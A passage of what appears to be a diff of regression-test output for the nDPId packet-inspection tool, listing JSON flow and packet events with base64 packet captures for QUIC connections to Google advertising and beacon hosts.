kbe9PV+IIrHpoitDn2tgzsP8r7ZFigp5npQffggv7haoAs8RFxW9SWR7ZNwh359zkE34\/kZ+CsTC3o+SFo1ZpZSYB7k5YMEXpbC5soIvzfLzo7VRt8wN+9a6G3Vxv65dYuC7WRoZGIss7sDsEtxaXd7D7HVuHBRBXtjzJYxAPsSQ91kS08TNtb53+I8qD12sc9NYwBxuGsxMraUNa\/Z\/\/E6cT8Coz5pCr9T27zIJBVcwrMWBRLfD+FD7WGlOX4REoNLW9dEFCROTtm6uBjditXnfFQ3MtyI4J3eKSt1aSAY6Hz5X1+DPOtei\/MOVBQGkMiqOrqu16dWphn6\/fshP4r6aWOrs7o67fomPJMNklnJkNanI86YjHvOE\/IjKudTLTEMkvMLUoZDWAtPQI+\/WYe66yUXkF7V0ZUo3ZIpLMlb5eVtuVMMe41GbHTf7qBkz676upo7ZFzgy0W42sY9gv7IriIXjYeDyZZDWo3TXCZ38h2Odbwls27Y01zUpB1YjLJf8LFOrRGSs7foRQrQDCkRPXFEc+6E+4fyYet1KpR47gVT419Ib+RJ9w
Jcl8ubiwrwMsSCENWlSShhkjiU9pREjVRHxJEn4uNAQz5HqwovfWEJcoieIC9oBUbwvwJMD31UWIE3vVHNJaV39UM1zitDAcHoAAw\/EaepuByZJ8czcyTY5trioI79lkjIUaQJwmyfwrWakn1mQxUudBvtAjxi8fCoWLp4XRoQiq88+b3SOVBDyWq6VLJeRBFDKqM\/C9BcOXa854dRZRXM61wBpYF32zaqLJBZ2zo0wYIk8viyYL\/mHrapgu+COKp2gV7Zvqdk13fOuL7gcwxx10cPHj+3nKWmr2kTbsXN3ZtBTVrm3"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495373983,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495373983,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": 
{"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1621495383906,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495383906,"pkt":"AAAAAAAAAAEA4PSECABFAAViG3tAAH4RcImokEAFie75AuA2AbsFTlZLwf8AAB0IkppBKZS2LWkAAEU0nZo4YZNOB4fchGmOnQKbaxZNu5+Rr9SHX\/+7nFbe3XcSn7NN4aZ8B34cI7rnBTgQPp7tDwb8aXE40NyFem3MElRtWbSgMUM8aL9mxQMt+BCtQtjknkoexLmgGym9SA4WETS+zt+sAqDuGybHtZbawAHOviOxar3NbIVfoyoECjzoxetvFQVMgJnBjFTieWPpv9GYlKtfw8vM+ABHtzCBdkVQrEtjZ2Kym5ZKNXBHERbHk7EYzIr+2EtCXPa8Zb8ZMSGVK5HAEFoUzTKCNaNkRU63dDqeoGw0HO03e3yfnEfPvmCKjFUtfo9FOxIdx7SRmN9cfYd\/5oUQ5rYUoic5STd5ys9Wj6gQeoYou3SNjAUyctcoqcQEZnGD0JnDrFdxtPksDZ5mOj9TjcCRvxSpY2BRzN1XD7P28JBy8RqTnX8VU3MUTvfBajgOzODfKpBvMnq1DnDxAJmoeuFL5GlkBD4PjdD9dOXUm8xpPRrQyN93MDy9Lh0jdKnypCUIRX+bQzDgeadkOYIZQaX60ccQFMHav4EcM87LkFI2Kkt53wfsAbzwSkC\/sh5h+SKq5tWBr0A1+3COF2lmckeKRU37IJzgJRoclYf
hyc5rysBbxh\/R8QZagVscGvoIOTayHYdJgNSs+ZQPUrY4MPNmoN6JKTjH9znGk8iQeNCxiuG4V\/iY6kK6x7AHF+\/rOforM7vc9c9xJuHH84tB0GmhBnyEob1rqD1zr4gpm2RteHorokh0IIRvCPptRZoPaSZ9NqseHmcV5YB9nzZXE4EDYo5f21RhnJLRnSslkj\/H219xwcR0XpMABos3On6qE9aY\/3dpratV\/uRejtrJjhSs43oZgIHypnRSOndd2zbpHR6gwc1xqIlwmu2mdOfB5bN2SKDS9FrSjqrzVx\/YW7gsqVvZYwKID5GJDPL1+LDs4fSPxdv6XMlw2dUT14Sq6cmPktyOFMZDEpK3HY4woBwm6vbhQpvAMOjG\/cyfvzapnRKKIOQSKnlGKbaihsN4mN1DABU\/AfcDRRjAdMEtVd098nAmg10LnfyE7f03sy2ezkhaOC8JAbJCJ+a9vBBI+EmcRWBsTfEX0tClNpXHrzX9DBQjMlBsSvVL3XnUgxicHNjPexCgWSnjBlIvFbkywpKcuzQkbhTg9p+EBuDI3LT2jEBiFGiWVAx1y3mNzzHbk9D3mTlp7QoNQHrpJbKVUKG3U0qdfkUT9BiOKjC4IBDsIt8+AuPFyVhrJ41NR8s0HejzpT6naGZbPieiVEnxW02zCwTQqyslurLWiPYuYizgWR26delkajTuI6BXQG5p3YGrqA+A+Zr7i661IjrsehT8FKL\/V2MDzuE\/fP6ylibvsyekoNKqSvsdEHi89orwhxyl8c5nq\/r8IFg7NvNFyGe\/nKumTxsqUu84Wo6HMgJtg262riyvhJrlldWx+jqgnOBAU4fls6MeuW9Cq4qfm6zU4VLXh5IjH1Py8vkruKnwZ8+Xm7\/tlv\/NhWcWkrOwYFZ6bck7+PZYh+NCodWvjJkVSe5MVzgI8PZy8sRLAK9bvUjxnANGxlVZm4cGfAi5tPOM9l2JM\/1yBZrGjk15cVdpdJnrXVfidMwtlWkoPIudRiKM1qGHsus7EcmploXydZ5\/mH\/0EBq9GCTOEjPkEjEYTQWlyjMdSzxKkqwTQu+I56FkdCZnSSthnsnb7XfGlpRYLkV5VeNoKc5d4pjMVNe\/52pvZLqjGj1nZ61WYiUzCCKq0\/Mnr55qnV\/nzBawGQP496cN5M\/m"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev 
Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1621495395690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495395690,"pkt":"AAAAAAAAAAEAaACzCABFAAVipg1AAH4RMnKokEAFZsLPs\/vxAbsFTg6Cyf8AAB0IgUbFpekOVCYAAEU06GZplAywEKbDCry5EETbpzZHS\/+ctZDEn8Qt8L+3XSgP\/QRbpKkvR3yjoYtHtOItTMP\/J9UsAdqCBdh2rnjFpD\/S9p5j0gqi6\/Z5LmmjTugi+3+2A56Su6KOgULzmrxxoMX8gDCxL9pwT\/\/glMxGOhJ4KTE7\/blbunZ4lQxY\/EmNDFVvwHdoRWRACFfA2iR5CCdBd+3oRtGglHNhFr484NI+Z0RCCnj6E8AMli0JlpZ0hOoK0ivmNTzcFwyySmvpxcFwAg61RSntAgfdC0AGtzo4y3UyaZFQPiRvQeQ5nDJnAqsRbTErzj9AMcpCH6TNnGDJD0Ipet45Eucx3uf3XRPDZLSwoVaO2XwE2UBC8Ypp8ROduqM0LgVHk447061aycTCZaXsHqFtEtV17WT4QoFolsGo\/UuLmbdX4fBh9oVrJJ6pOpcDVi8TH4RI3BivD2J\/kdhdSoFhpuq9YHZnkvDprncZdKcWDI0Lxyf7dDBIXI6bz3C\/x45+PMZ5I1dYqWfeP+n9Y3LOO7s6QV1unXf+WTWJninotKr714Vq9AIzRTrefbOMjhaLqyDLlF5BdYSUM5gTgoPx49oQDRPdJ7a1MBm3APpLT35YHdyilv3tfmjks4fEBltqUPxcJZgUmaDN8Rf0f9lFyt1ioE71sp+8mTyxpZ5VwhjoUvmI6EVuUtNMadIk6x7X+Na\/ZARvdabmPF6toMqDEGLm725EBI3YzGTOL\/mUoC2LE6FomE3JALJPAVmbpR4S5wvkGnqIDrYguIT1mH03jUtbD1hZrfYwo021rdvbZLGkDSbpKanoX6hwE3Xrh1lMhepvhHUBD1PwvjeXOI7ihVhjK62JiMIu8Xu\/CJCx8fRyNbu2z3w2vupOcdoe8Me++EE6n4DCv72t6GfNDeRXyJbfYF6HEwhjRaciKZIHOh3RmNhiDn948Y74LD0+AM5oAbTJWX9LP04itY9ClWH5flhojTFFOwFZGPSRv1WJb9w1NiX\/N6BELu1vs9NZqPkryvurnhZqOqcfs0xRh5Yws7xmPi75Cfr0EjgDLZmPnSK9Y2aijxhpaUW3oVEcSvgOQCztfKmRdvEfJGGR1+Ab4qZqwOtaHuFs1m3m5ld2K1YbnXeki071UWEWPHiSDavs3THubRh\/o9H82GNqi43q6kiCPUzuXIYnPl+Cn6Bp0DOI3AsGU2\/KAkOoIEJE2LFhqvu46T1GcVIcHlsWEVdPTRo4jfFS7lOaoMoNQ7tWcO86aXKUliVbxXv5NVI829JeM\/\/o0yJSZEVnCcvF7FQUmQL68fe3HTGGXZLOWm6c8wVFxl\/6Picm\/V2seHAOz1GMyw3T+bveM5m3rTBwie2mjtgPR7Yxl\/toB3aVEEDYkXEjyef9LN5zZnFChQQhZbecsd8YeFC+QCwamJ2Z23sTUHkrJ+MQqoJhxOAy\/\/Mwszyy7rcrV8gwkK31aMi30M1V3
LKqHqJwnB7ugO6A1F6C9gihRhNkgUIVGt68JTdFCaAxsePYd75UEwv5xBcMHiXC3mGwQ+y4AOXGpwXeDQ5\/80Oa9w9+Ml9Rg+Isc3Ld1fmePt84drp\/daoWi9ZMQIajY2lyuqw61Alyxt59OKE3k0CpOAZduHghg0VQSWOAoUcp6o4NHFl4k3rCWuqNQa\/VkHvrA5AVBpsEMxOi5Ga9XYSlw2wK3vwxguwIpXfyLWhpqq0F0AkEDoBDw95NZlTkcuA91L8OJ790NaIAtZ2\/VKU0Ox\/ZEHiQDtz8sykDoB5BoN8A0Dq4L8aU"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
-00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
+00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495406541,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1621495406541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495406541,"pkt":"AAAAAAAAAAEAguyCCABFAAViWAZAAH4RzDyokEAFdZR1HtkUAbsFTjoPw\/8AAB0IpS3BjFDLjIQANwBT7u2pdIqujeX7dANOUZTfnxYRmwoEAlv2cGTwvVRQ05f2ZqQkJC4DQmQ8UNekM\/B\/b5bCsc1E\/TyztkqJFBdbO9qB5JeKWS4bDeTB1XZ2V0ErVv64RKGTuBvdjjgCfX06su07x0Z3asXbqdCmQWMHOI1qTINqU\/oJKTNqX7IQ8f85\/qgrCdnviYFuqVMz9SBqVmpNYNfu5FP0maF7snVSzjZqhhCpRZsxX21PAu9uVnhiEb\/LUX9+7+xtXcTtey2D4GkwD4RpLMRUga1FJ4rjTGwvE0+AsvJJDdiioVoqv7\/LjuVI5T7U\/lJ3SCSYuTsqGMVwkymjUknc45YgYS64+q3tWvD9MnWpueOOG1aytIWYz\/ZQgMDZNokTq3aqJGp\/FoTSi+dPRPc1z4wXa0iO2cF402cWDgjuPmatByfDq7YBu2C9+eZYtfPRDsT4VCBhIJO5WiI7+kwTM88vMDXogMlbA3\/6bmTdrTzLvTcHCw3Xr0WehWXYo+xQSWRhu\/uuhl128v5pUOiXsl0bDy5EmHbr20S6kbHO+0LqHDJVbRf8mZ3awQ4pwAWwQWnVx37XBa\/2EtrHyyojkS2zQTcHh1fe+CoFmAvaJovW\/StICtvQrvayaHiBV733DAwKy\/Y3526K9OrAU4jsURbnovvToOxvx8drWx9RSU6gdEHnV8zWJwVS1TDnXtsWGtomfdqnhZkNK5u7kj47rGJaFqQU1bObGeviiSoviHnYR18MNvE78MR8EUodW3McLRHAztvvQBcBcNtZ9NnBwkRaprMMq72CixCPd107Y7JgoGmIJbNdeGCCwkpwtckTVEVe619QplF0g
